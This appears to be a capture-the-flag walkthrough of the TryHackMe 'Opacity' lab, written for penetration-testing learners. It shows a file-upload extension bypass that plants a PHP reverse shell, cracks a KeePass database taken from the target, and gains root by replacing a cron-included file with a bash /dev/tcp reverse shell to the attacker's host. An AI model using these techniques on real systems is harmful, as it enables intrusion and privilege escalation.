TryHackMe Opacity is an easy machine that can help you in the penetration testing learning process. We perform file upload bypass in addition to exploiting cron job due to insufficient directory permissions. There are 2 hash keys located on the machine (user – local.txt and root – proof.txt). Can you find them and become root?

Initial Enumeration

The process kicks off with network scanning using nmap.

nmap -A <target_IP>

This comprehensive scan (-A switch) reveals the following open ports:

  • Port 22: SSH (Secure Shell)
  • Port 80: HTTP (Hypertext Transfer Protocol) – Identified as the primary initial attack surface.
  • Ports 139 & 445: Samba (SMB/CIFS file sharing)

Web Server Analysis and Exploitation

Navigating to the web server on port 80 initially presents a login form. However, the video stresses bypassing this login and focusing on directory enumeration.

  • Directory Brute-forcing: The tool gobuster is used to discover hidden directories.
gobuster dir -u http://<target_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This scan uncovers a /cloud directory.

File Upload Vulnerability: The /cloud directory features an interface for uploading files via an external URL. This is identified as a vector for a reverse shell attack. The video specifically mentions using a “pen test monkey reverse shell” (a common PHP reverse shell) and highlights the necessity of configuring the attacker’s IP address and listening port within the shell script.

Hosting the Reverse Shell: To serve the malicious shell script for the upload, a simple Python HTTP server is started on the attacker’s machine.

python3 -m http.server 8000

Bypassing File Extension Filters: The initial upload attempt fails due to server-side validation expecting an image file. A clever bypass technique is demonstrated:

  • The PHP reverse shell (e.g., shell.php) is renamed by appending # followed by a fake image extension (e.g., shell.php#a.png).
  • The web server processes the filename up to the # character (executing shell.php), while the filter is tricked by the apparent .png extension.

Triggering the Shell: After a successful upload using the crafted URL (e.g., http://<attacker_IP>:8000/shell.php#a.png), the provided link to the “image” is accessed. Crucially, the #a.png portion is removed from the URL in the browser to ensure the PHP code executes. This action establishes a reverse shell connection back to the attacker’s machine, which is listening for incoming connections (e.g., using nc -lvnp 4545).

User Privilege Escalation

The initial reverse shell provides access as the web server user (often www-data).

  • Shell Stabilization: The raw shell is typically upgraded to a more interactive and stable shell.
  • Internal Enumeration:
    • The home directory of a user named sysadmin (/home/sysadmin) is discovered.
    • Inside, local.txt (likely the user flag) and a scripts directory are found. Attempting to read local.txt fails due to insufficient permissions.
    • Further investigation in /opt reveals a file named data.kdbx. This extension signifies a KeePass password database.
  • KeePass Database Cracking:
    1. Transferring the Database: A Python HTTP server is started on the target machine within the /opt directory to serve the data.kdbx file.
python3 -m http.server 80

Then, wget is used on the attacker’s machine to download it.

wget http://<target_IP>/data.kdbx

Hash Extraction: The keepass2john utility converts the .kdbx file into a hash format that John the Ripper can understand.

keepass2john data.kdbx > keepass_hash.txt

Password Cracking: John the Ripper is used with a wordlist (e.g., rockyou.txt) to crack the master password for the KeePass database.

john --wordlist=/usr/share/wordlists/rockyou.txt keepass_hash.txt

Gaining User Access: The cracked master password opens the data.kdbx file (using KeePassXC or a similar tool), revealing credentials for the sysadmin user. These credentials are then used to log in via SSH.

ssh sysadmin@<target_IP>

Reading the User Flag: Once logged in as sysadmin, the local.txt file can be read.

cat /home/sysadmin/local.txt

Root Privilege Escalation

With sysadmin access, the focus shifts to escalating privileges to root.

  • Analyzing the scripts Directory: The previously found /home/sysadmin/scripts directory contains:
    • Library/ (a subdirectory)
    • skill.php (a PHP script) Examining skill.php reveals it’s a backup script that:
    1. Archives the scripts directory.
    2. Copies the archive to /var/backups.
    3. Deletes files from /var/www/html/cloud/images/. The script also includes a file named backup.inc from the Library/ subdirectory. It’s likely this script is run periodically by a cron job, potentially as root.
  • Identifying the Vulnerability:
    • An initial idea is to modify skill.php directly. However, skill.php is owned by root and not writable by sysadmin.
    • The key lies in the permissions of the Library/ directory. While Library/backup.inc is owned by root, the Library/ directory itself is owned by sysadmin and is writable by sysadmin.
  • Exploiting Writable Directory:
    1. sysadmin can delete the original Library/backup.inc.
    2. sysadmin can then create a new Library/backup.inc file containing a PHP reverse shell payload (configured with the attacker’s IP and a new listening port).
// Contents of the malicious backup.inc
<?php
// PHP reverse shell code targeting attacker's IP and port
shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<new_port> 0>&1'");
?>
  • Gaining Root Access:
    • A new netcat listener is started on the attacker’s machine on the <new_port>.
    • When the cron job executes skill.php (as root), it will include and execute the malicious Library/backup.inc.
    • This triggers the PHP reverse shell, connecting back to the attacker’s listener with root privileges.
    • The root flag (/root/root.txt) can then be read.

This multi-stage attack effectively demonstrates common penetration testing techniques, from initial web server enumeration and exploitation to sophisticated privilege escalation tactics.

TryHackMe Opacity Room Answers

What is the  local.txt flag?
 

What is the proof.txt flag?

 

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles